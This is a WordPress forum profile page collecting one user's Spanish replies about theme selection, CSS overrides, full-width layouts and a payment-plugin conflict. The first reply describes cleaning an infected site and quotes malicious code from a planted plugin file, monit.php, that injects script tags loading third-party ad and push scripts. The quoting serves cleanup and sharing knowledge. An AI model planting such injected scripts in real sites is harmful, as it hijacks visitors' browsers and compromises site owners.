Respuestas de foro creadas

Viendo 15 respuestas - de la 1 a la 15 (de un total de 21)
  • Foro: Seguridad
    En respuesta a: Malware detectado (y Ads)
    Iniciador del debate edugimeno

    (@edugimeno)

    El problema es que la web no la he construido yo ni tengo backup de antes de la inefccion y no sé hasta qué punto es seguro todo el proceso que viene ahí.
    De cualquier manera, creo que lo tengo.

    (Por si a alguien le ha pasado lo mismo y llega aqui por este malware):
    En wp-content/plugins había un fichero monit.php que definitivamente tenía el código malicioso:

    […]
    $ad_code=’
    <script type=»text/javascript» src=»//ofgogoatan.com/apu.php?zoneid=3260072″ async data-cfasync=»false»></script>
    <script src=»https://pushsar.com/pfe/current/tag.min.js?z=3260077″ data-cfasync=»false» async></script>
    <script type=»text/javascript» src=»//inpagepush.com/400/3324386″ data-cfasync=»false» async=»async»></script>
    ‘;
    {…}
    Además había un fichero admin_ips.txt que asumo que es desde qué IP’s se permite administrar remotamente este script
    He borrado ambos y he borrado la entrada con «option_name=AD_CODE» de WP_OPTIONS

    A partir de ahí he recargado la página varias veces y el AD_CODE no ha vuelto a aparecer.
    Además he vuelto a escanear la web con los servicios online que antes me daban «malware» y ya me da «limpio».
    Sé que puede haber quedado una puerta abierta a posibles inyecciones futuras, estaré pendiente, pero al menos ahora mismo está limpio, y ya tengo alguna pista.

    Saludos

    Foro: Seguridad
    En respuesta a: Malware detectado (y Ads)
    Iniciador del debate edugimeno

    (@edugimeno)

    Ok pero no hay manera de «auditar» la aplicación y conocer qué plugin o página o segmento de código se está ejecutando en el momento que vuelve a insertarse el «ad_code=……» en WP_OPTIONS para ir directo a él?
    Ya he hecho una gran parte de lo indicado en la guia que comentas pero hay muchas acciones que no es tan fácil de seguir en según qué páginas.
    No es que me estén atacando la web cada minuto, es que ya hay algo de código dentro que cada vez que se ejecuta (cuando alguien recarga la página), se re-crea la entrada en BD que activa los anuncios… Es, por ahora, ahí donde quiero atacar. Luego ya cerrar puertas

    Gracias

    Iniciador del debate edugimeno

    (@edugimeno)

    Increible lo que hace el saber de verdad, no por prueba y error.
    Pues clavao! Ya puedes verlo, muchas gracias José Luis, un abrazo

    Iniciador del debate edugimeno

    (@edugimeno)

    Ya suponía….Bueno, he encontrado una opción de la plantilla para sacar fuera los iconos sociales, aunque el del carrito si que se queda ahí.
    Estoy viendo como centrar ahora el menú (por CSS) en su espacio, me está costando ver cual atributo es
    Cuestión de tiempo, gracias!

    Iniciador del debate edugimeno

    (@edugimeno)

    Vale, definitivamente me quedo con esta plantilla, porque ya la he avanzado suficiente para querer cambiarla
    Solo me gustaría cambiar una cosa. El cliente quiere centrar el menú. Ahora mismo el menú y los enlaces a redes sociales (y carrito) están en el mismo contenedor.
    Para poder centrar el menú, debe estar sólo por si mismo, y los enlaces en otro contenedor. Al estilo de esta web: SingularOlivia
    Es complicado mover de sitio un bloque entero? Imagino que esto ya no es añadir una linea de CSS….

    Gracias!

    Iniciador del debate edugimeno

    (@edugimeno)

    Pues tienes toda la razón porque copio y pego tu sección de código en lugar del mio y funciona! No tengo ni idea de cual pudiera ser la diferencia…No sé si se habrá quedado algun caracter no imprimible por ahí….El caso es que ahora va, muchas gracias!!

    Iniciador del debate edugimeno

    (@edugimeno)

    Ok pues por ahora me mantengo usando el Css Adicional. Como tengo todas las personalizaciones por ahora ahí juntas, ya investigaré al final, si me quedo con esa plantilla, si muevo todo a un Child Theme o no.

    Hay cosas que no consigo sobreescribir, no sé por qué.
    Por ejemplo, el site-header, en el personalizador del tema solo me deja subir hasta 50px. He ido a sobreescribirlo con el CSS Adicional, poniendo:

    .site-title {
        font-size: 80px;
    }

    y no me lo cambia. Con el inspector de CSS de chrome veo que el mio me sale POR DEBAJO del origunal de 50px, con lo que el mio sale tachado. Es como si leyera el mio ANTES que el original, con lo que el original sobreescribe al mio en vez de alrevés

    Sin saber mucho de ello, he añadido IMPORTANT! al atributo, y no solo no cambia nada, sino que el inspector de CSS me da un warning de que no es válido…
    Alguna idea?

    Gracias!!!

    • Esta respuesta fue modificada hace 12 meses por edugimeno.
    Iniciador del debate edugimeno

    (@edugimeno)

    Ok pero con lo que estoy haciendo yo ahora, con CSS Adicional, cuando actualice WP o plantilla no pierdo personalizaciones?

    Al final me he liado a tocar la plantilla, y la he modificado para 100% width…no sé si con eso me habré cargado algo, la web va a ser sencilla y la probaré en todas las páginas y con todas las pantallas (movil/tablet) antes de darla por válida, pero por ahora ocupa pantalla completa.

    Me faltan aun todos los contenidos, solo tengo alguna foto de muestra, pero bueno, ando trasteando ya con la plantilla

    Muchas gracias de nuevo

    Iniciador del debate edugimeno

    (@edugimeno)

    Pues es «sorprendente» porque en su web (link) uno de los tags que mencionan es «full width»… Por eso, entre otras cosas, lo elegí.

    Si te digo la verdad, al final cuando uno trabaja un poco un plantilla la acaba cogiendo el gusto y cuando personalizas algo y te cuesta más deshacerte del trabajo
    He quitado bastante padding en varios elementos (no me gusta el desperdicio de espacio que traen muchas de serie), y por ahora, no a veo tan mal
    Ya sé que la teoría dice hacer un child theme pero cuando miré el «howto» me pareció algo complejo, estoy haciendo los cambios del css en el apartado de «CSS Adicional» de la configuración del template, eso esta demasiado mal??

    GRACIAS!

    Iniciador del debate edugimeno

    (@edugimeno)

    Gracias José Luis, nunca había hecho un uso más que básico de los bloques de Gutenberg, y estoy mirando y ni mis bloques ni el contenedor de grupos, me dan opciones de ancho completo, será cuestión de la plantilla??
    El Grupo de Bloques solo me deja elegir colores, anchor, y css adicional.
    El bloque en cuestion que estoy tocando (es un incrustado de «WP carousel» no da ninguna opcion en absoluto en el panel de atributos
    Gracias!

    Iniciador del debate edugimeno

    (@edugimeno)

    No conocía el kit, parece util.
    Ya está la web visitable, aunque «en bragas»
    https://www.confiteriaelalcazar.com/
    El principal problema que tengo con la mayoría de las plantillas es que los contendidos ocupan solo un % del ancho, me gustan las páginas que ocupan 100%, y siempre acabo resolviendolo tocando plantilla, no sé si me estoy perdiendo algo
    Si, cerraré el post cuando tenga clara la plantilla a usar, que era el objetivo

    Gracias!!

    Iniciador del debate edugimeno

    (@edugimeno)

    Entendido, ahora estoy centrando mi búsqueda en esta web sólamente.
    El cliente busca algo minimalista y de tonalidades tenues.
    Por ahora la única que parece candidata es esta:
    ESFAHAN
    indica escplícitamente que es compatible con woo-commerce

    No sé si alguien tendrá algo más que aportar
    Gracias!

    Iniciador del debate edugimeno

    (@edugimeno)

    Hola Martin, muchas gracias por tu respuesta. me salió la respuesta de poner localhost (no sé si lo puse yo en otro post antiguo y me salió como sugerencia) porque no tengo la web aún visitable, no había nada que poner en URL, sólo tiene un wordpress tal cual sale del paquete

    Voy a mirar las opciones que me das. A priori no había mirado las templates ahí sino simplemente en google con «wordpress template pasteleria» o algo asi…

    Gracias de nuevo! Espero enseñaros la página cuando avance!

    Iniciador del debate edugimeno

    (@edugimeno)

    Ya estaba marcado así, no te sale resuelto? Yo asi lo veo
    Gracias

    Iniciador del debate edugimeno

    (@edugimeno)

    Hola, no se me había ocurrido ver en el «debug» del chrome el error interno
    Muchas gracias.
    Pues la verdad que estoy usando ya ese plugin.
    PEEEERO entrando a confirmar que era ese el plugin- he podido ver que tenía activo otro plugin, que pense usar antes y desestimé, que era de pago directo a Redsys sin pasar por Woocommerce ni nada. En cuanto he desactivado el plugin que te digo parece que ha pasado a funcionar.
    Gracias porque con sólo mencionar versiones me has hecho ir al gestor de plugins y darme cuenta :))

Viendo 15 respuestas - de la 1 a la 15 (de un total de 21)